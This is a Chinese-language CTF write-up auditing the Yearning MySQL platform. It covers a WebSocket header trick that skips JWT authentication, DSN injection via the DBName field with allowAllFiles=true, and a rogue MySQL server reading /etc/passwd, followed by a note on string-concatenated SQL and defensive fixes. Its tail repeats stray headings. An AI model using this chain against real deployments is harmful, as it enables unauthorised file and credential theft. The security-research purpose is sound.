Golang DSN注入与审计实战：以Yearning-MySQL审计平台为例<\/h1>

0x01 前言<\/h2>

本文详细分析d3ctf2024中Yearning-MySQL审计平台的漏洞，重点讲解Golang代码审计技巧、DSN注入原理及rouge_mysql_server工具的使用。通过本案例，您将掌握：<\/p>

Golang Web应用的安全审计方法<\/li>
DSN注入漏洞的原理与利用<\/li>
Websocket协议的安全隐患<\/li>

使用rouge_mysql_server进行攻击验证<\/li> <\/ol>

0x02 环境搭建<\/h2>

前端搭建<\/h3>

# 克隆前端项目<\/span>
<\/span><\/span>git clone https:\/\/github.com\/cookieY\/Yearning-gemini
<\/span><\/span>
<\/span><\/span># 设置npm源<\/span>
<\/span><\/span>npm config set registry https:\/\/registry.npm.taobao.org
<\/span><\/span>
<\/span><\/span># 编译前端<\/span>
<\/span><\/span>cd Yearning-gemini
<\/span><\/span>npm install --force
<\/span><\/span>npm install -legacy-peer-deps
<\/span><\/span>npm run build
<\/span><\/span>
<\/span><\/span># 将编译结果移动到后端目录<\/span>
<\/span><\/span>mv dist ..\/Yearning\/src\/service
<\/span><\/span><\/code><\/pre>后端搭建<\/h3>
# 克隆后端项目<\/span>
<\/span><\/span>git clone https:\/\/github.com\/cookieY\/Yearning
<\/span><\/span>
<\/span><\/span># 解决依赖<\/span>
<\/span><\/span>cd Yearning
<\/span><\/span>go mod tidy
<\/span><\/span>
<\/span><\/span># 运行<\/span>
<\/span><\/span>go run main.go
<\/span><\/span><\/code><\/pre>重要配置说明<\/strong>：<\/p>

conf.toml<\/code>中host不能设置为127.0.0.1<\/li>
本地docker MySQL数据库名默认为"Yearning"<\/li>
<\/ul>
0x03 Websocket协议安全分析<\/h2>
Websocket协议特点<\/h3>

基于HTTP协议改进，实现客户端与服务端双向通信<\/li>
连接建立后保持持久连接，直到主动断开<\/li>
适用于实时应用：网页游戏、聊天、证券交易等<\/li>
<\/ul>
安全风险点<\/h3>
在router.go<\/code>中，\/api\/v2<\/code>路由组使用JWTWithConfig中间件进行鉴权，但存在特殊绕过：<\/p>
if<\/span> isWebsocket<\/span>(c<\/span>.Request<\/span>()) {
<\/span><\/span>    return<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过条件<\/strong>：<\/p>

HTTP请求头包含：
Connection: upgrade
Upgrade: websocket
<\/code><\/pre>
<\/li>
Websocket请求自动包含这些头部，可直接绕过鉴权<\/li>
<\/ul>
验证工具<\/strong>：

推荐使用Apifox进行Websocket请求测试<\/p>
0x04 DSN注入漏洞分析<\/h2>
漏洞位置<\/h3>
fetchtableinfo<\/code>函数中的u.FetchTableFieldsOrIndexes<\/code>可设置DSN参数<\/p>
漏洞原理<\/h3>


关键逻辑<\/strong>：<\/p>

当source_id<\/code>无效时，model.DSN<\/code>其他字段会被置空<\/li>
model.NewDBSub<\/code>函数中先FormatDSN<\/code>拼接字符串，再ParseDSN<\/code>解析成对象<\/li>
<\/ul>
<\/li>

DSN处理流程<\/strong>：<\/p>

InitDSN<\/code>执行formatDSN<\/code>操作（结构体→字符串）<\/li>
driver.New<\/code>执行parseDSN<\/code>操作（字符串→结构体）<\/li>
<\/ul>
<\/li>

注入点<\/strong>：<\/p>

只有DBName<\/code>字段完全可控<\/li>
parseDSN<\/code>是倒序解析，寻找\/<\/code>符号后的数据库名<\/li>
<\/ul>
<\/li>
<\/ol>
DSN格式分析<\/h3>
合法DSN格式示例：<\/p>
admin:123456@tcp(192.168.193.205:3307)\/foo?allowAllFiles=true&
<\/code><\/pre>
关键参数<\/strong>：<\/p>

allowAllFiles=true<\/code>：允许加载本地文件（攻击必要条件）<\/li>
<\/ul>
0x05 攻击实施<\/h2>
攻击准备<\/h3>


使用rmb122的rogue_mysql_server项目：<\/p>
git clone https:\/\/github.com\/rmb122\/rogue_mysql_server
<\/span><\/span>cd rogue_mysql_server
<\/span><\/span>
<\/span><\/span># 生成配置文件模板<\/span>
<\/span><\/span>.\/rogue_mysql_server -generate
<\/span><\/span>
<\/span><\/span># 启动恶意服务器<\/span>
<\/span><\/span>.\/rogue_mysql_server -config config.yaml
<\/span><\/span><\/code><\/pre><\/li>

确保VPS安全组开放相应端口<\/p>
<\/li>
<\/ol>
攻击步骤<\/h3>


构造恶意Websocket请求：<\/p>

地址：ws:\/\/target\/api\/v2\/fetch\/fields<\/code><\/li>
注入恶意DSN到DBName参数<\/li>
<\/ul>
<\/li>

请求示例格式：<\/p>
{
<\/span><\/span>  "source_id"<\/span>: "invalid_id"<\/span>,
<\/span><\/span>  "db_name"<\/span>: "malicious_db?allowAllFiles=true&"<\/span>,
<\/span><\/span>  \/\/ 其他必要参数...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

通过rogue_mysql_server读取目标文件：<\/p>

成功读取\/etc\/passwd<\/code>等敏感文件<\/li>
<\/ul>
<\/li>
<\/ol>
0x06 其他漏洞点<\/h2>
SQL盲注<\/h3>
FetchTableFieldsOrIndexes<\/code>函数中的show<\/code>语句存在字符串拼接，可能导致SQL盲注：<\/p>
\/\/ 伪代码示例
<\/span><\/span><\/span><\/span>query<\/span> :=<\/span> "SHOW "<\/span> +<\/span> userInput<\/span> +<\/span> " FROM..."<\/span>
<\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p>

通过时间延迟等技术进行盲注攻击<\/li>
需要进一步分析具体业务逻辑<\/li>
<\/ul>
0x07 防御措施<\/h2>


DSN注入防御<\/strong>：<\/p>

严格校验DBName等输入参数<\/li>
使用预定义的DSN模板而非拼接<\/li>
禁用危险参数如allowAllFiles<\/code><\/li>
<\/ul>
<\/li>

Websocket安全<\/strong>：<\/p>

即使Websocket请求也应进行完整鉴权<\/li>
不要因为协议不同而跳过安全检查<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对所有用户输入进行严格过滤<\/li>
使用参数化查询避免SQL注入<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong>：<\/p>

数据库账户使用最小必要权限<\/li>
禁止FILE等危险权限<\/li>
<\/ul>
<\/li>
<\/ol>
0x08 总结<\/h2>
通过本案例我们学习到：<\/p>

Golang应用审计需要关注DSN处理逻辑<\/li>
Websocket协议实现不当可能导致鉴权绕过<\/li>
DSN注入可导致RCE或敏感信息泄露<\/li>
rogue_mysql_server是验证MySQL相关漏洞的有效工具<\/li>
<\/ol>
关键收获<\/strong>：<\/p>

深入理解Golang数据库连接处理机制<\/li>
掌握DSN注入的完整攻击链<\/li>
学习到实际审计中的调试技巧和工具使用<\/li>
<\/ul>

Golang DSN注入与审计实战：以Yearning-MySQL审计平台为例<\/h1>

0x02 环境搭建<\/h2>

0x03 Websocket协议安全分析<\/h2>

漏洞位置<\/h3> fetchtableinfo<\/code>函数中的u.FetchTableFieldsOrIndexes<\/code>可设置DSN参数<\/p>

0x05 攻击实施<\/h2>

0x06 其他漏洞点<\/h2>

漏洞位置<\/h3>
`fetchtableinfo<\/code>函数中的u.FetchTableFieldsOrIndexes<\/code>可设置DSN参数<\/p>`